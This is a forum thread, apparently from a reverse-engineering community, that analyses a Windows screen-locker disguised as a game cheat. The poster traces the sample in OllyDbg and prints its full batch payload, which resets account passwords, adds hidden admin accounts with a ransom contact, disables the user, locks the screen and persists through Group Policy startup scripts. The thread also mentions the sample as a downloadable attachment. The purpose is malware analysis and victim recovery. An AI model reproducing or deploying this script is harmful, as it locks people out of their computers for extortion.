记一次破解简单的锁机恶意程序

911061873

关键字：英魂之刃全图辅助_内部定制版




前两天有个小弟来求助，说电脑被锁了，并且发来了一个锁电脑的程序。

在虚拟机中测试了下如图。

恢复以前的快照，开始对程序动手
用OD载入，查字符串。

像这种锁机程序一般都是用CMD命令对系统帐户进行操作，果然在字符串里面找到了一个“cmd.exe /c”。

跟进去，然后F2下断点，F9运行起来，程序停到断点的地方了。

F7单步运行一下，发现有一个文件路径入栈，是临时目录里面的一个批处理文件。

打开临时目录，设置系统隐藏文件可见，就看到了这个批处理。

查看批处理的内容

[Bash shell] 纯文本查看 复制代码

@shift
 set opw=lzj_
 set rnum=%random%
 set npw=%opw%%rnum:~-2%%rnum:~-3%
 net user administrator %npw% &
 net user Administrator %npw% &
 net user %username% %npw% &
 net user 要密码加QQ360665490 %npw% /add &
 net user  aeon%rnum% %npw% /add &
 net localgroup administrators 要密码加QQ360665490 /add &
 net localgroup administrators aeon%rnum% /add &
 net user %username% /active:no &
 net user 要密码加QQ360665490 /active:yes &
 net user aeon%rnum% /active:yes &
 rundll32.exe user32.dll,LockWorkStation &
 copy %0 C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup /y  &&
 echo [Startup]>C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini  &&
 echo 0CmdLine=%~nx0>>C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini &&
 echo 0Parameters=>>C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini

到这里，帐户名和密码就已经知道了。
密码是“lzj_”加上有一个前缀为“aeon”的帐户后面五位随机数的后两位和后三位。
例如随机数是“12345”，则密码为“lzj_45345”

52pojiee

所以密码应该是 lzj_52952吗？

911061873

WGT 发表于 2018-2-21 22:18
net user  aeon%rnum% %npw% /add & 他这里这么写是什么效果？

set opw=lzj_

set rnum=%random%  #rnum等于随机数
set npw=%opw%%rnum:~-2%%rnum:~-3%  #npm等于变量opw加上随机数的后两位再加上随机数后三位

net user aeon%rnum% %npw% /add &  #这句话就是添加了一个用户名为“aeon加随机数”的用户。

911061873

锁机程序在这里
英魂之刃全图辅助_内部定制版.rar (49.75 KB, 下载次数: 93)

2018-2-21 20:42 上传

点击文件名下载附件

浪涛依旧在

哇  楼主棒棒哒，我是最近开始学习OD的，这样的帖子对我来说像营养快线多谢楼主了

shelovesi

还有这种骚套路~~膜拜膜拜

popddos

居然还有这么下流的作者。

byh3025

哦，一个系统密码

噬魂丶魂殇

谢谢楼主分享

似若尘埃

感谢楼主分享！

迷雾

这肯定小学生弄的

鼠窜之徒

你怎么知道是临时目录，没讲清楚，教程白搭